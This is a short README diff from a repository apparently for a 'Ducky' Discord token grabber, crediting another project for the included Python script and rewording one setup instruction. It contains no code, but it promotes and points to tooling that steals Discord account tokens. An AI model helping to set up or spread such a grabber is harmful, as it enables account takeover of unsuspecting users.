RexMan04/Ducky-Discord-Token-Grabber/README.md

 I did not make the python script that is included in these files.
 [The original is here](https://github.com/wodxgod/Discord-Token-Grabber)

-To run this script, follow step 2 in the previous link in the "How to use" section.
+To setup the script, follow step 2 in the previous link in the "How to use" section.

 After that, everything should be good to go.